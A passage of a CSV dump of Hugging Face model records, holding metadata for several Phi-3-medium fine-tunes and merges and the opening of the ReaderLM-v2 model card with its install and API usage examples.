","{""id"": ""shisa-ai/shisa-v1-phi3-14b"", ""author"": ""shisa-ai"", ""sha"": ""3b47a24cc0893bde9636392a5c1db4f78ac7a478"", ""last_modified"": ""2024-05-25 19:12:52+00:00"", ""created_at"": ""2024-05-23 01:20:28+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 2, ""downloads_all_time"": null, ""likes"": 2, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""safetensors"", ""phi3"", ""text-generation"", ""generated_from_trainer"", ""conversational"", ""custom_code"", ""base_model:microsoft/Phi-3-medium-128k-instruct"", ""base_model:finetune:microsoft/Phi-3-medium-128k-instruct"", ""license:mit"", ""autotrain_compatible"", ""text-generation-inference"", ""endpoints_compatible"", ""region:us""], ""pipeline_tag"": ""text-generation"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model: microsoft/Phi-3-medium-128k-instruct\nlicense: mit\ntags:\n- generated_from_trainer\nmodel-index:\n- name: outputs/phi3-medium-128k-14b.8e6\n results: []"", ""widget_data"": [{""text"": ""Hi, what can you help me with?""}, {""text"": ""What is 84 * 3 / 2?""}, {""text"": ""Tell me an interesting fact about the universe!""}, {""text"": ""Explain quantum computing in simple terms.""}], ""model_index"": [{""name"": ""outputs/phi3-medium-128k-14b.8e6"", ""results"": []}], ""config"": {""architectures"": [""Phi3ForCausalLM""], ""auto_map"": {""AutoConfig"": ""microsoft/Phi-3-medium-128k-instruct--configuration_phi3.Phi3Config"", ""AutoModelForCausalLM"": ""microsoft/Phi-3-medium-128k-instruct--modeling_phi3.Phi3ForCausalLM""}, ""model_type"": ""phi3"", ""tokenizer_config"": {""bos_token"": ""<s>"", ""chat_template"": ""{% for message in messages %}{% if (message['role'] == 'user') %}{{'<|user|>' + '\n' + message['content'] + '<|end|>' + '\n' + '<|assistant|>' + '\n'}}{% elif (message['role'] == 'assistant') %}{{message['content'] + '<|end|>' + '\n'}}{% endif %}{% endfor %}"", ""eos_token"": ""<|endoftext|>"", ""pad_token"": ""<|endoftext|>"", ""unk_token"": ""<unk>"", ""use_default_system_prompt"": false}}, ""transformers_info"": {""auto_model"": ""AutoModelForCausalLM"", ""custom_class"": null, ""pipeline_tag"": ""text-generation"", ""processor"": ""AutoTokenizer""}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='added_tokens.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00001-of-00006.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00002-of-00006.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00003-of-00006.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00004-of-00006.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00005-of-00006.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00006-of-00006.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors.index.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.model', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": {""parameters"": {""BF16"": 13960238080}, ""total"": 13960238080}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-05-25 19:12:52+00:00"", ""cardData"": ""base_model: microsoft/Phi-3-medium-128k-instruct\nlicense: mit\ntags:\n- generated_from_trainer\nmodel-index:\n- name: outputs/phi3-medium-128k-14b.8e6\n results: []"", ""transformersInfo"": {""auto_model"": ""AutoModelForCausalLM"", ""custom_class"": null, ""pipeline_tag"": ""text-generation"", ""processor"": ""AutoTokenizer""}, ""_id"": ""664e99dc54518864d0827e5f"", ""modelId"": ""shisa-ai/shisa-v1-phi3-14b"", ""usedStorage"": 27921004451}",1,,0,,0,https://huggingface.co/mradermacher/shisa-v1-phi3-14b-GGUF,1,,0,huggingface/InferenceSupport/discussions/new?title=shisa-ai/shisa-v1-phi3-14b&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bshisa-ai%2Fshisa-v1-phi3-14b%5D(%2Fshisa-ai%2Fshisa-v1-phi3-14b)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
|
| 459 |
+
https://huggingface.co/flammenai/Mahou-1.2-phi-14B,N/A,N/A,1,,0,,0,,0,,0,,0
|
| 460 |
+
DarqueDante/Phi3Mix,"---
|
| 461 |
+
license: apache-2.0
|
| 462 |
+
tags:
|
| 463 |
+
- moe
|
| 464 |
+
- merge
|
| 465 |
+
- mergekit
|
| 466 |
+
- lazymergekit
|
| 467 |
+
- phi3_mergekit
|
| 468 |
+
- microsoft/Phi-3-medium-128k-instruct
|
| 469 |
+
base_model:
|
| 470 |
+
- microsoft/Phi-3-medium-128k-instruct
|
| 471 |
+
- microsoft/Phi-3-medium-128k-instruct
|
| 472 |
+
---
|
| 473 |
+
|
| 474 |
+
# Phi3Mix
|
| 475 |
+
|
| 476 |
+
Phi3Mix is a Mixture of Experts (MoE) made with the following models using [Phi3_LazyMergekit](https://colab.research.google.com/drive/1Upb8JOAS3-K-iemblew34p9h1H6wtCeU?usp=sharing):
|
| 477 |
+
* [microsoft/Phi-3-medium-128k-instruct](https://huggingface.co/microsoft/Phi-3-medium-128k-instruct)
|
| 478 |
+
* [microsoft/Phi-3-medium-128k-instruct](https://huggingface.co/microsoft/Phi-3-medium-128k-instruct)
|
| 479 |
+
|
| 480 |
+
|
| 481 |
+
## 🧩 Configuration
|
| 482 |
+
|
| 483 |
+
```yaml
|
| 484 |
+
base_model: microsoft/Phi-3-medium-128k-instruct
|
| 485 |
+
gate_mode: cheap_embed
|
| 486 |
+
experts_per_token: 1
|
| 487 |
+
dtype: float16
|
| 488 |
+
experts:
|
| 489 |
+
- source_model: microsoft/Phi-3-medium-128k-instruct
|
| 490 |
+
positive_prompts: [""research, logic, math, science""]
|
| 491 |
+
- source_model: microsoft/Phi-3-medium-128k-instruct
|
| 492 |
+
positive_prompts: [""creative, art""]
|
| 493 |
+
```
|
| 494 |
+
|
| 495 |
+
## 💻 Usage
|
| 496 |
+
|
| 497 |
+
```python
|
| 498 |
+
import torch
|
| 499 |
+
from transformers import AutoModelForCausalLM, AutoTokenizer
|
| 500 |
+
|
| 501 |
+
model = ""DarqueDante/Phi3Mix""
|
| 502 |
+
|
| 503 |
+
tokenizer = AutoTokenizer.from_pretrained(model)
|
| 504 |
+
|
| 505 |
+
model = AutoModelForCausalLM.from_pretrained(
|
| 506 |
+
model,
|
| 507 |
+
trust_remote_code=True,
|
| 508 |
+
)
|
| 509 |
+
|
| 510 |
+
prompt=""How many continents are there?""
|
| 511 |
+
input = f""<|system|>You are a helpful AI assistant.<|end|><|user|>{prompt}<|assistant|>""
|
| 512 |
+
tokenized_input = tokenizer.encode(input, return_tensors=""pt"")
|
| 513 |
+
|
| 514 |
+
outputs = model.generate(tokenized_input, max_new_tokens=128, do_sample=True, temperature=0.7, top_k=50, top_p=0.95)
|
| 515 |
+
print(tokenizer.decode(outputs[0]))
|
| 516 |
+
```","{""id"": ""DarqueDante/Phi3Mix"", ""author"": ""DarqueDante"", ""sha"": ""ae6d7223ff73a688b9359e9ac5a01436cc84fb30"", ""last_modified"": ""2024-05-25 09:26:36+00:00"", ""created_at"": ""2024-05-25 09:11:00+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 0, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""safetensors"", ""phi3"", ""text-generation"", ""moe"", ""merge"", ""mergekit"", ""lazymergekit"", ""phi3_mergekit"", ""microsoft/Phi-3-medium-128k-instruct"", ""conversational"", ""custom_code"", ""base_model:microsoft/Phi-3-medium-128k-instruct"", ""base_model:finetune:microsoft/Phi-3-medium-128k-instruct"", ""license:apache-2.0"", ""autotrain_compatible"", ""text-generation-inference"", ""endpoints_compatible"", ""region:us""], ""pipeline_tag"": ""text-generation"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model:\n- microsoft/Phi-3-medium-128k-instruct\n- microsoft/Phi-3-medium-128k-instruct\nlicense: apache-2.0\ntags:\n- moe\n- merge\n- mergekit\n- lazymergekit\n- phi3_mergekit\n- microsoft/Phi-3-medium-128k-instruct"", ""widget_data"": [{""text"": ""Hi, what can you help me with?""}, {""text"": ""What is 84 * 3 / 2?""}, {""text"": ""Tell me an interesting fact about the universe!""}, {""text"": ""Explain quantum computing in simple terms.""}], ""model_index"": null, ""config"": {""architectures"": [""Phi3ForCausalLM""], ""auto_map"": {""AutoConfig"": ""configuration_phi3.Phi3Config"", ""AutoModelForCausalLM"": ""modeling_phi3.Phi3ForCausalLM""}, ""model_type"": ""phi3"", ""tokenizer_config"": {""bos_token"": ""<s>"", ""chat_template"": ""{% for message in messages %}{% if (message['role'] == 'user') %}{{'<|user|>' + '\n' + message['content'] + '<|end|>' + '\n' + '<|assistant|>' + '\n'}}{% elif (message['role'] == 'assistant') %}{{message['content'] + '<|end|>' + '\n'}}{% endif %}{% endfor %}"", ""eos_token"": ""<|endoftext|>"", ""pad_token"": ""<s>"", ""unk_token"": ""<unk>"", ""use_default_system_prompt"": false}}, ""transformers_info"": {""auto_model"": ""AutoModelForCausalLM"", ""custom_class"": null, ""pipeline_tag"": ""text-generation"", ""processor"": ""AutoTokenizer""}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='added_tokens.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='configuration_phi3.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='mergekit_moe_config.yml', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00001-of-00028.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00002-of-00028.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00003-of-00028.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00004-of-00028.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00005-of-00028.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00006-of-00028.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00007-of-00028.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00008-of-00028.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00009-of-00028.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00010-of-00028.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00011-of-00028.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00012-of-00028.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00013-of-00028.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00014-of-00028.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00015-of-00028.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00016-of-00028.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00017-of-00028.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00018-of-00028.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00019-of-00028.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00020-of-00028.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00021-of-00028.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00022-of-00028.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00023-of-00028.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00024-of-00028.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00025-of-00028.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00026-of-00028.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00027-of-00028.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00028-of-00028.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors.index.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='modeling_phi3.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.model', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": {""parameters"": {""F16"": 24970695680}, ""total"": 24970695680}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-05-25 09:26:36+00:00"", ""cardData"": ""base_model:\n- microsoft/Phi-3-medium-128k-instruct\n- microsoft/Phi-3-medium-128k-instruct\nlicense: apache-2.0\ntags:\n- moe\n- merge\n- mergekit\n- lazymergekit\n- phi3_mergekit\n- microsoft/Phi-3-medium-128k-instruct"", ""transformersInfo"": {""auto_model"": ""AutoModelForCausalLM"", ""custom_class"": null, ""pipeline_tag"": ""text-generation"", ""processor"": ""AutoTokenizer""}, ""_id"": ""6651ab245ff9a886712d7387"", ""modelId"": ""DarqueDante/Phi3Mix"", ""usedStorage"": 49941933211}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=DarqueDante/Phi3Mix&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5BDarqueDante%2FPhi3Mix%5D(%2FDarqueDante%2FPhi3Mix)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
|
| 517 |
+
dankalin/phi3-medium-instruct,"---
|
| 518 |
+
library_name: transformers
|
| 519 |
+
language:
|
| 520 |
+
- ru
|
| 521 |
+
base_model: microsoft/Phi-3-medium-128k-instruct
|
| 522 |
+
---
|
| 523 |
+
","{""id"": ""dankalin/phi3-medium-instruct"", ""author"": ""dankalin"", ""sha"": ""11fdb76c610205d9f9befec15b7f458582da8fc3"", ""last_modified"": ""2024-09-03 00:49:43+00:00"", ""created_at"": ""2024-07-15 16:36:08+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 0, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""safetensors"", ""phi3"", ""text-generation"", ""conversational"", ""custom_code"", ""ru"", ""base_model:microsoft/Phi-3-medium-128k-instruct"", ""base_model:finetune:microsoft/Phi-3-medium-128k-instruct"", ""autotrain_compatible"", ""text-generation-inference"", ""endpoints_compatible"", ""region:us""], ""pipeline_tag"": ""text-generation"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model: microsoft/Phi-3-medium-128k-instruct\nlanguage:\n- ru\nlibrary_name: transformers"", ""widget_data"": null, ""model_index"": null, ""config"": {""architectures"": [""Phi3ForCausalLM""], ""auto_map"": {""AutoConfig"": ""configuration_phi3.Phi3Config"", ""AutoModelForCausalLM"": ""modeling_phi3.Phi3ForCausalLM""}, ""model_type"": ""phi3"", ""tokenizer_config"": {""bos_token"": ""<s>"", ""chat_template"": ""{% if messages[0]['role'] == 'system' %} {% set offset = 1 %} {% else %} {% set offset = 0 %} {% endif %}{{ bos_token }}{% for message in messages %}{% if (message['role'] == 'user') != (loop.index0 % 2 == offset) %}{{ raise_exception('Conversation roles must alternate user/assistant/user/assistant/...') }}{% endif %}{{ '<|' + message['role'] + '|>\n' + message['content'] | trim + '<|end|>' + '\n' }}{% endfor %}{% if add_generation_prompt %}{{ '<|assistant|>\n' }}{% endif %}"", ""eos_token"": ""<|endoftext|>"", ""pad_token"": ""<|endoftext|>"", ""unk_token"": ""<unk>"", ""use_default_system_prompt"": false}}, ""transformers_info"": {""auto_model"": ""AutoModelForCausalLM"", ""custom_class"": null, ""pipeline_tag"": ""text-generation"", ""processor"": ""AutoTokenizer""}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='added_tokens.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='configuration_phi3.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00001-of-00006.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00002-of-00006.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00003-of-00006.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00004-of-00006.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00005-of-00006.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00006-of-00006.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors.index.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='modeling_phi3.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.model', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": {""parameters"": {""F16"": 13959695360}, ""total"": 13959695360}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-09-03 00:49:43+00:00"", ""cardData"": ""base_model: microsoft/Phi-3-medium-128k-instruct\nlanguage:\n- ru\nlibrary_name: transformers"", ""transformersInfo"": {""auto_model"": ""AutoModelForCausalLM"", ""custom_class"": null, ""pipeline_tag"": ""text-generation"", ""processor"": ""AutoTokenizer""}, ""_id"": ""66954ff85e5e72a434cd5cde"", ""modelId"": ""dankalin/phi3-medium-instruct"", ""usedStorage"": 27919918755}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=dankalin/phi3-medium-instruct&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bdankalin%2Fphi3-medium-instruct%5D(%2Fdankalin%2Fphi3-medium-instruct)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
|
QwQ-32B-Preview_finetunes_20250424_193500.csv_finetunes_20250424_193500.csv
ADDED
|
The diff for this file is too large to render.
See raw diff
|
|
|
Qwen2-72B_finetunes_20250426_215237.csv_finetunes_20250426_215237.csv
ADDED
|
The diff for this file is too large to render.
See raw diff
|
|
|
Qwen2-7B-Instruct_finetunes_20250425_165642.csv_finetunes_20250425_165642.csv
ADDED
|
The diff for this file is too large to render.
See raw diff
|
|
|
ReaderLM-v2_finetunes_20250425_165642.csv_finetunes_20250425_165642.csv
ADDED
|
@@ -0,0 +1,305 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
|
| 2 |
+
jinaai/ReaderLM-v2,"---
|
| 3 |
+
pipeline_tag: text-generation
|
| 4 |
+
language:
|
| 5 |
+
- multilingual
|
| 6 |
+
inference: false
|
| 7 |
+
license: cc-by-nc-4.0
|
| 8 |
+
library_name: transformers
|
| 9 |
+
---
|
| 10 |
+
|
| 11 |
+
<br><br>
|
| 12 |
+
|
| 13 |
+
<p align=""center"">
|
| 14 |
+
<img src=""https://huggingface.co/datasets/jinaai/documentation-images/resolve/main/logo.webp"" alt=""Jina AI: Your Search Foundation, Supercharged!"" width=""150px"">
|
| 15 |
+
</p>
|
| 16 |
+
|
| 17 |
+
<p align=""center"">
|
| 18 |
+
<b>Trained by <a href=""https://jina.ai/""><b>Jina AI</b></a>.</b>
|
| 19 |
+
</p>
|
| 20 |
+
|
| 21 |
+
[Blog](https://jina.ai/news/readerlm-v2-frontier-small-language-model-for-html-to-markdown-and-json) | [API](https://jina.ai/reader) | [Colab](https://colab.research.google.com/drive/1FfPjZwkMSocOLsEYH45B3B4NxDryKLGI?usp=sharing) | [AWS](https://aws.amazon.com/marketplace/pp/prodview-jwfct4j4rvxk2?sr=0-21&ref_=beagle&applicationId=AWSMPContessa) | [Azure](https://azuremarketplace.microsoft.com/en-us/marketplace/apps/jinaai.reader-lm-v2-vm)| [Arxiv](https://arxiv.org/abs/2503.01151)
|
| 22 |
+
|
| 23 |
+
# ReaderLM-v2
|
| 24 |
+
|
| 25 |
+
`ReaderLM-v2` is a 1.5B parameter language model that converts raw HTML into beautifully formatted markdown or JSON with superior accuracy and improved longer context handling. Supporting multiple languages (29 in total), `ReaderLM-v2` is specialized for tasks involving HTML parsing, transformation, and text extraction.
|
| 26 |
+
|
| 27 |
+
## What's New in `ReaderLM-v2`
|
| 28 |
+
|
| 29 |
+
`ReaderLM-v2` represents a significant leap forward from its predecessor, with several key improvements:
|
| 30 |
+
|
| 31 |
+
- **Better Markdown Generation**: Thanks to its new training paradigm and higher-quality training data, the model excels at generating complex elements like code fences, nested lists, tables, and LaTeX equations.
|
| 32 |
+
- **JSON Output**: Introduces direct HTML-to-JSON generation using predefined schemas, eliminating the need for intermediate markdown conversion.
|
| 33 |
+
- **Longer Context Handling**: Handles up to 512K tokens combined input and output length, with improved performance on long-form content.
|
| 34 |
+
- **Multilingual Support**: Comprehensive support across 29 languages for broader applications.
|
| 35 |
+
- **Enhanced Stability**: Greatly alleviates degeneration issues after generating long sequences through contrastive loss during training.
|
| 36 |
+
|
| 37 |
+
## Model Overview
|
| 38 |
+
|
| 39 |
+
- **Model Type**: Autoregressive, decoder-only transformer
|
| 40 |
+
- **Parameter Count**: 1.54B
|
| 41 |
+
- **Context Window**: Up to 512K tokens (combined input and output)
|
| 42 |
+
- **Hidden Size**: 1536
|
| 43 |
+
- **Number of Layers**: 28
|
| 44 |
+
- **Query Heads**: 12
|
| 45 |
+
- **KV Heads**: 2
|
| 46 |
+
- **Head Size**: 128
|
| 47 |
+
- **Intermediate Size**: 8960
|
| 48 |
+
- **Supported Languages**: English, Chinese, Japanese, Korean, French, Spanish, Portuguese, German, Italian, Russian, Vietnamese, Thai, Arabic, and more (29 total)
|
| 49 |
+
|
| 50 |
+
---
|
| 51 |
+
|
| 52 |
+
# Usage
|
| 53 |
+
|
| 54 |
+
Below, you will find instructions and examples for using `ReaderLM-v2` locally using the Hugging Face Transformers library.
|
| 55 |
+
For a more hands-on experience in a hosted environment, see the [Google Colab Notebook](https://colab.research.google.com/drive/1FfPjZwkMSocOLsEYH45B3B4NxDryKLGI?usp=sharing).
|
| 56 |
+
|
| 57 |
+
## Via Reader API
|
| 58 |
+
|
| 59 |
+
`ReaderLM-v2` is now fully integrated with [Reader API](https://jina.ai/reader/). To use it, simply specify `x-engine: readerlm-v2` in your request headers and enable response streaming with `-H 'Accept: text/event-stream'`:
|
| 60 |
+
|
| 61 |
+
```bash
|
| 62 |
+
curl https://r.jina.ai/https://news.ycombinator.com/ -H 'x-engine: readerlm-v2' -H 'Accept: text/event-stream'
|
| 63 |
+
```
|
| 64 |
+
|
| 65 |
+
You can try it without an API key at a lower rate limit. For higher rate limits, you can purchase an API key. Please note that ReaderLM-v2 requests consume 3x the normal token count from your API key allocation. This is currently an experimental feature, and we're working with the GCP team to improve GPU efficiency.
|
| 66 |
+
|
| 67 |
+
## On Google Colab
|
| 68 |
+
|
| 69 |
+
You can try `ReaderLM-v2` via our [Colab notebook](https://colab.research.google.com/drive/1FfPjZwkMSocOLsEYH45B3B4NxDryKLGI?usp=sharing), which demonstrates HTML-to-markdown conversion, JSON extraction, and instruction-following using the HackerNews frontpage as an example. The notebook is optimized for Colab's free T4 GPU tier and requires `vllm` and `triton` for acceleration and running.
|
| 70 |
+
|
| 71 |
+
Note that the free T4 GPU has limitations—it doesn't support bfloat16 or flash attention 2, leading to higher memory usage and slower processing of longer inputs. Nevertheless, ReaderLM-v2 successfully processes large documents under these constraints, achieving processing speeds of 67 tokens/s input and 36 tokens/s output. For production use, we recommend an RTX 3090/4090 for optimal performance.
|
| 72 |
+
|
| 73 |
+
## Local Usage
|
| 74 |
+
|
| 75 |
+
To use `ReaderLM-v2` locally:
|
| 76 |
+
|
| 77 |
+
1. Install the necessary dependencies:
|
| 78 |
+
|
| 79 |
+
```bash
|
| 80 |
+
pip install transformers
|
| 81 |
+
```
|
| 82 |
+
|
| 83 |
+
2. Load and run the model:
|
| 84 |
+
|
| 85 |
+
```python
|
| 86 |
+
